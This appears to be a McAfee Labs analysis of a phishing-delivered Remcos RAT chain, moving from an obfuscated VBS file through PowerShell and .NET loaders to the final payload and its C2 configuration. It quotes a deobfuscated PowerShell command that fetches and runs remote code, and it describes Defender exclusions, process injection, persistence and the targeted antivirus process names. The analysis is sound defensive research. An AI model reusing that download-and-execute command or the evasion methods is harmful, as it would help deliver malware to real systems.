Authored by Preksha Saxena
McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. A phishing email contained a ZIP/RAR attachment. Inside this ZIP, was a heavily obfuscated VBS file.
Remcos is a sophisticated RAT which provides an attacker with backdoor access to the infected system and collects a variety of sensitive information. Remcos incorporates different obfuscation and anti-debugging techniques to evade detection. It regularly updates its features and makes this malware a challenging adversary.
Figure 1: Execution Flow
Stage 1: Analysis of VBS file
VBS file is downloaded from a RAR file which is named as “August 2023 Statement of Account.z” This VBS file used various techniques to make analysis very difficult; including lots of commented code, and random strings that mask the true execution chain from being quickly visible. The actual data for execution is obfuscated too.
Investigating this VBS script started with dealing with the large comment blocks as shown in figure below.
Figure 2:VBS Script
One obfuscated string references a URL. The script contains a replace function to deobfuscate the proper command line.
Another part of VBS script is the execute function shown in below image, which merely decodes a fake message.
Figure 3:Deobfuscating PowerShell command using replace function.
The purpose of this VBS script is to download a payload using PowerShell. To increase the size, and make the script obfuscated, comments were added. The PowerShell command deobfuscates to:
“powershell -w 1 -exeC Bypass -c “”[scriptblock]::Create ((Invoke-WebRequest ‘http://22.214.171.124/87656.txt’ -UseBasicParsing).Content).Invoke();”””
Stage 2: Analysis of PowerShell script (87656.txt)
The downloaded file, 87656.txt, is an obfuscated PowerShell script.
Figure 4:Obfuscated PowerShell Script
The deobfuscation logic first searches for any variable containing “mdR”; in this case the result is ‘MaximumDriveCount’. From this string, characters at positions [3,11,2] are selected, resulting in the string “iex”. Here malware obfuscates iex(Invoke-Expression) command to evade itself from static detection.
Figure 5:Resolving IEX
Then, PowerShell script decodes the data using the Base64String algorithm and decompresses the decoded data using the Deflate Stream algorithm.
Decompressed data is again a PowerShell script which is analyzed below.
Stage 3: Analysis of decompressed PowerShell script
The decompressed PowerShell script is large and obfuscated:
Figure 6: Decompressed PowerShell script
The first part of the script has the same logic present in the first PowerShell file. It is again decoding invoke-expression “ieX” by using the psHome variable.
Figure 7:Deobfuscating PowerShell script
The second part of the PowerShell script contains a base64 encoded PE file, which will be analyzed in a later stage.
Figure 8: Base64 encoded data.
The third part of PowerShell script is used to inject the decoded PE file in a newly created process. After deobfuscation, the code below is used for code injection. “Wintask.exe” is launched as a new process by the PowerShell script and the aforementioned PE file is injected in the Wintask.exe process.
Figure 9: Code used for PE injection.
Windows Defender exclusions are added.
Figure 10: Exclusion code
Stage 4: Analysis of decoded PE File
The 1.1MB PE file is a .NET binary, using an MSIL loader.
Figure 11: MSIL Loader
The Main function calls the Units function, which calls a random function.
Figure 12:Main function
The random function contains a large amount of encrypted data, stored in a text variable.
Figure 13: Encrypted data
The ‘text’ data is first converted from string to hex array then reversed and stored in variable ‘array’. The decryption key is hardcoded and stored in variable ‘array4’. The key is “0xD7” (215 in decimal).
Figure 14: code for converting data to uppercase.
The decryption loop issues the RC4 algorithm. The data decrypts a PE file, which is a DLL (Dynamic Link Library), loaded and executed using the ‘NewLateBinding.LateGet()’ method, passing the payload file (dGXsvRf.dll) as an argument as shown below.
To execute the decrypted DLL in memory, the malware uses reflecting code loading. In this process, malware injects and executes the decrypted code in the same process. For this, the malware uses the load parameter in the ‘NewLateBinding.LateGet()’ function.
Figure 15: RC4 algorithm
Figure 16: New instance created for decrypted dll
Stage 5: Analysis of dGXsvRf.dll
Decrypted DLL ‘dGXsvRf.dll’ is the SykCrypter Trojan, using a resource named “SYKSBIKO” containing an encrypted payload.
Figure 17: Encrypted payload
SykCrypter decrypts the final payload and decrypts many strings related to identifying the presence of AV software, persistence, and anti-debugging techniques. The SykCrypter encrypted data is very large and is decrypted using a simple XOR operation with 170 as the key and current index.
Figure 18: SykCryptor Encrypted data
Each string is decrypted and accessed using a predefined function which hardcodes its length and offset in a large byte array. The final payload is stored in a resource and is decrypted using the RC4 algorithm with the key “uQExKBCIDisposablev”.
Figure 19: RC4 Algorithm
Another .NET dll with size 0x1200 and the method name, “Zlas1” is used for deflation.
Figure 20: Loading DLL for deflation.
The DLL then decrypts a list of various security solution process names:
Figure 21:Code for decrypting Security processes Names
The decrypted list of process names include:
vsserv bdservicehost odscanui bdagent
bullgaurd BgScan BullGuardBhvScanner etc.
The malware also drops acopy of itself in the %appdata% folder using cmd.
Figure 22: Copying file.
To persist system reboots, the malware creates a shortcut file in the Documents folder with a.pif extension, and creates a registry Run key entry.
Figure 23: Persistence Mechanism
The SykCrypter Dll decrypts and loads a .NET file and calls its “GetDelegateForFunctionPointer” function, creating delegation to all APIs from kernel32 and NTDll.dll in the same method. It loads GetThreadContext, SetThreadContext, ReadProcessMemory, VirtualAllocEx, NtUnmapViewOfSection and so on.
Then, finally it loads “WriteProcessMemory,” API which injects the decrypted payload into a process and calls ResumeThread.
Figure 24: Process Injection
Stage 6: Analysis of final payload
The final payload is a Microsoft Visual C++ 8 executable with size of 477 KB. Strings directly visible in file are:
Figure 25: Strings in payload
The configuration file of Remcos is present in RCData “SETTINGS“, which is encrypted with the RC4 algorithm. In the given sample, the key size is 76 byte long.
Figure 26: RC4 encrypted configuration file
Figure 27: Decrypted configuration
The Remcos configuration has C2 information (126.96.36.199), its port number (2404), mutex created by malware (Rmc-OB0RTV) and other configuration details. It has the capability to harvest information from various applications, such as browsers, email clients, cryptocurrency wallets etc. It also enables remote access for an attacker and can act as a dropper for other malware.
RemcosRat is a complex multi-stage threat. McAfee Labs unpacked the how this malware downloads and executes VBS and PowerShell scripts; how the threat unwraps different layers and downloads the final Remcos remote access payload. At McAfee, we are committed to providing our customers with robust and effective threat defense that detects and protects against threats like RemcosRat and many other families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats to keep you safe.
Indicators of Compromise (IOCs):
Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats.